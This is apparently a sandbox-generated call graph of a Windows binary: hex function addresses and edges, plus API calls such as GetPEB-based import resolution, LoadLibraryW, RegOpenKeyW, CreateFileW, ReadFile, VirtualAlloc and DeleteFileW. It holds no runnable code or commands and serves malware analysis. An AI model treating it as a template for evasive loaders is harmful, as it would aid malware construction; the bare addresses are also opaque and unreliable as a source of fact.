8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 CloseHandle 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 